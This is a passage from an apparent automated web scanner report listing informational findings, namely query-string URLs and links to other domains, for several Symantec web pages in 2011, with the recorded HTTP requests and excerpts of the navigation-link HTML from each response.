                   <a href="http://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html" target="_blank">Report Code Signing Misuse</a><br />
                   <a href="http://www.verisign.com/support/ssl-certificates-support/secure-site-seal/abuse.html" target="_blank">Report VeriSign Seal Abuse</a><br />
                   <a href="http://www.verisign.com/support/ssl-certificates-support/extended-validation-certificate-complaint/index.html" target="_blank">Report EV Certificate Complaint</a>
...[SNIP]...
f you have questions regarding the VeriSign Secured.. Seal or VeriSign Trust Seal, including how to obtain one for use on your site or how it is being used on a site you have visited, please visit our <a href="http://www.verisign.com/ssl/seal/index.html" target="_blank">seal information page</a>
...[SNIP]...
<div style="float:left; width:50px; margin-right:8px">
                               <a href="http://www.verisign.com/ssl/buy-ssl-certificates/index.html?tid=sym_a_box" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-buy-btn.gif" width="50" height="15" alt="Buy SSL Certificates" />
...[SNIP]...
<div>

                               <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/ssl/buy-ssl-certificates/index.html?tid=sym_a_box" title="Buy SSL Certificates" target="_blank">SSL Certificates</a>
...[SNIP]...
<div style="float:left; width:50px; margin-right:8px">
                               <a href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VTC_US&tid=sym_a_box" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-buy-btn.gif" width="50" height="15" alt="Buy VeriSign Trust Seal" />
...[SNIP]...
<div>
                               <a style="font-family:arial; font-size:11px" href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VTC_US&tid=sym_a_box" title="Buy VeriSign Trust Seal" target="_blank">VeriSign Trust Seal</a>
...[SNIP]...
<div style="float:left; width:50px; margin-right:8px">
                               <a href="http://www.verisign.com/code-signing/index.html?tid=sym_a_box" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-buy-btn.gif" width="50" height="15" alt="Buy Code Signing Certificates" />
...[SNIP]...
<div>
                               <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/code-signing/index.html?tid=sym_a_box" title="Buy Code Signing" target="_blank">Code Signing</a>
...[SNIP]...
<div style="float:left; width:50px; margin-right:8px">

                               <a href="http://www.verisign.com/ssl/free-trial/index.html" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-try-btn.gif" width="50" height="15" alt="Free VeriSign Trials" />
...[SNIP]...
<div>
                               <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/ssl/free-trial/index.html" title="Free Trials" target="_blank">Free Trials</a>
...[SNIP]...
<div style="float:left; width:50px; margin-right:8px">
                               <a href="http://www.verisign.com/ssl/current-ssl-customers/renew-ssl/index.html?tid=sym_a_box" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-renew-btn.gif" width="50" height="15" alt="Renew SSL Certificates" />
...[SNIP]...
<div>
                               <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/ssl/current-ssl-customers/renew-ssl/index.html?tid=sym_a_box" title="Renew SSL Certificates" target="_blank">SSL Certificates</a>
...[SNIP]...
<div style="float:left; width:50px; margin-right:8px">
                               <a href="https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US&tid=sym_a_box" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-signin-btn.gif" width="50" height="15" alt="Sign In to My Account" />
...[SNIP]...
<div>
                               <a style="font-family:arial; font-size:11px" href="https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US&tid=sym_a_box" title="Sign In to My Account" target="_blank">My Account</a>
...[SNIP]...
<div style="float:left; width:90px; margin-right:5px">
                               <a href="http://www.verisign.com/get-verisign-seal/index.html?tid=sym_a_box" target="_blank"><img src="/content/en/us/enterprise/images/theme/b-thm-verisign-logo.gif" width="90" height="49" alt="Get a VeriSign Seal" />
...[SNIP]...
<div style="padding-top:5px">
                               <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/get-verisign-seal/index.html?tid=sym_a_box" title="Get a VeriSign Seal" target="_blank">Get a VeriSign Seal</a>
...[SNIP]...
<div style="padding-bottom: 5px;"><a href="http://twitter.com/VeriSignAuth" target="_blank">
               <div style="float: left;">
...[SNIP]...
<div style="padding-bottom: 5px;"><a href="http://www.facebook.com/VeriSignAuthentication" target="_blank">
               <div style="float: left;">
...[SNIP]...
<div style="padding-bottom: 5px;"><a href="http://www.youtube.com/verisignauth" target="_blank">
               <div style="float: left;">
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.59. http://www.symantec.com/business/verisign/fraud-detection-service

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /business/verisign/fraud-detection-service

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business/verisign/fraud-detection-service?tid=gnps HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621646660-New%7C1336357646660%3B%20event69%3Devent69%7C1336357646662%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/4

Response

HTTP/1.1 404 Not Found
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 22137
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:30:49 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Error: Page Not Found - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-
...[SNIP]...
<div id="globalNavMainInner5">
<a href='http://buy.norton.com?trf_id=symcom&amp;inid=us_ghp_topnav_link1_to_store'>Store</a>
...[SNIP]...
<li><a href="http://buy.norton.com?trf_id=symcom&amp;inid=us_hho_homepage_topnav1_to_store">Store</a>
...[SNIP]...
<h3><a href="http://buy.norton.com?trf_id=symcom&amp;inid=us_ghp_topnav_link1_to_store">Store</a>
...[SNIP]...
<b><a href="http://buy.norton.com/?trf_id=symcom&amp;inid=us_hho_errorpage_to_store">Norton</a>
...[SNIP]...
<li><a href="http://buy.norton.com/?trf_id=symcom&amp;inid=us_hho_errorpage_to_store">Welcome</a>
...[SNIP]...
<li><a href="http://buy.norton.com/?trf_id=symcom&amp;inid=us_hho_errorpage_to_store">Shop Products</a>
...[SNIP]...
<li><a href="http://buy.norton.com/upgrades-renewals?ctry=US&amp;lang=EN&amp;trf_id=symcom&amp;inid=us_hho_errorpage_to_store">Renew</a>
...[SNIP]...
<li><a href="http://buy.norton.com/?trf_id=symcom&amp;inid=us_hho_errorpage_to_store">Shopping Resources</a>
...[SNIP]...
<li><a href="http://buy.norton.com/?trf_id=symcom&amp;inid=us_hho_errorpage_to_store">Store Services</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>

<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>

<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>

<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>

<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>

<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.60. http://www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /partners/sales-and-marketing/sales-marketing.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /partners/sales-and-marketing/sales-marketing.jsp?id=marketing HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://partnerlocator.symantec.com/public/search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; bizProdScrollVertical=0; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp%2525253Fid%2525253Dmarketing%252526ot%25253DA%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 41218
Cache-Control: public, max-age=3577
Date: Fri, 09 Sep 2011 21:39:01 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Marketing - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-
...[SNIP]...
<div id="globalNavMainInner5">
<a href='http://buy.norton.com?trf_id=symcom&amp;inid=us_ghp_topnav_link1_to_store'>Store</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.61. http://www.symantec.com/store/products/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /store/products/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /store/products/index.jsp?inid=us_pagenotfound_smb_store HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 28649
Cache-Control: public, max-age=3523
Date: Fri, 09 Sep 2011 21:31:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Store Shop Products - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<
...[SNIP]...
<div style="float:right; text-align:right; padding-top:10px;">
       
       Business Store&nbsp;&nbsp;|&nbsp;&nbsp;<a href="http://buy.norton.com/estore/mf/landingProductFeatures?sfid=0DkpLFXQ3kCwDtN5LGxP0QYnM2M1k82n0GYrZ6wYNQkcsXHnc441!2017174390!1267046176849">Norton Store</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.62. http://www.symantec.com/store/resources/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /store/resources/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /store/resources/index.jsp?inid=us_pagenotfound_smb_store HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 27682
Cache-Control: public, max-age=3600
Date: Fri, 09 Sep 2011 21:31:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Store Shopping Resources - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
